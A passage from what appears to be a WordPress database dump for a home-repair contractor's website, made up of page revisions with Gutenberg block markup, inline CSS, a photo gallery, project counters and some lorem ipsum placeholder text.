pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Gutters','','inherit','closed','closed','','229-revision-v1','','','2022-08-23 18:20:47','2022-08-23 18:20:47','',229,'https://cteisys.com/?p=429',0,'revision','',0),(434,1,'2022-08-23 18:37:29','2022-08-23 18:37:29',' ','','','publish','closed','closed','','434','','','2022-08-23 18:37:29','2022-08-23 18:37:29','',0,'https://cteisys.com/?p=434',7,'nav_menu_item','',0),(477,1,'2022-08-24 17:38:14','2022-08-24 17:38:14','<!-- wp:paragraph -->\n<p>We take pride in our work. Let us show you. Contact us today (248) 393-5000</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":450,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25660384_1899639140050518_6277447985993158090_n.jpg\" alt=\"\" class=\"wp-image-450\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":449,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/25592097_1899639136717185_4321270429465251825_n.jpg\" alt=\"\" class=\"wp-image-449\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23844616_1868197126528053_4157812209739993838_n.jpg\" alt=\"\" class=\"wp-image-448\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":447,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23843260_1868197133194719_3148537784022538449_n.jpg\" alt=\"\" class=\"wp-image-447\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":446,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23795383_1868197219861377_192834509148892931_n.jpg\" alt=\"\" class=\"wp-image-446\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/23517652_1851799148167851_4518671867384389908_n.jpg\" alt=\"\" class=\"wp-image-445\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":444,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18119545_1646581548689613_8488233903493088586_n.jpg\" alt=\"\" class=\"wp-image-444\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18118635_1641106092570492_880445919232503964_n.jpg\" alt=\"\" class=\"wp-image-442\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":412,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/280659088_5602458996435162_2458487168335242841_n.jpg\" alt=\"\" class=\"wp-image-412\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":413,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/c60adea113fb2f5f80419bb170309509.jpg\" alt=\"\" class=\"wp-image-413\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":414,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/DSC03903-1.jpg\" alt=\"\" class=\"wp-image-414\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/12038053_1138498862831220_6417864339135922840_n.jpg\" alt=\"\" class=\"wp-image-436\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":438,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/17992072_1641106229237145_7019424871005086701_n-1.jpg\" alt=\"\" class=\"wp-image-438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" alt=\"\" class=\"wp-image-440\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":441,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18057957_1641106209237147_2139335743547445839_n.jpg\" alt=\"\" class=\"wp-image-441\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a9bea998-7d0c-4e4b-928d-b108fd7a7c6d\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a9bea998-7d0c-4e4b-928d-b108fd7a7c6d.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"44ecaf20-952d-4f7f-81b7-7317b0c6079a\"} -->\n<style type=\"text/css\"> .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-44ecaf20-952d-4f7f-81b7-7317b0c6079a .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-44ecaf20-952d-4f7f-81b7-7317b0c6079a skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b\"} -->\n<style type=\"text/css\"> .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b3fc6680-34b3-4f71-a3bd-85e5b8c52e9b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"a821e40c-d9db-4df8-a874-ba207b78e2ab\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a821e40c-d9db-4df8-a874-ba207b78e2ab skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Repair</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"40e7f1d9-3bdc-4663-8f6e-103dd744774b\"} -->\n<style type=\"text/css\"> .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-40e7f1d9-3bdc-4663-8f6e-103dd744774b .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-40e7f1d9-3bdc-4663-8f6e-103dd744774b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"96825ed7-add1-4702-868f-b0437418bf4e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-96825ed7-add1-4702-868f-b0437418bf4e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"3c19c43e-2a66-4e93-bc55-5b7f00e5a678\"} -->\n<style type=\"text/css\"> .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3c19c43e-2a66-4e93-bc55-5b7f00e5a678 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n 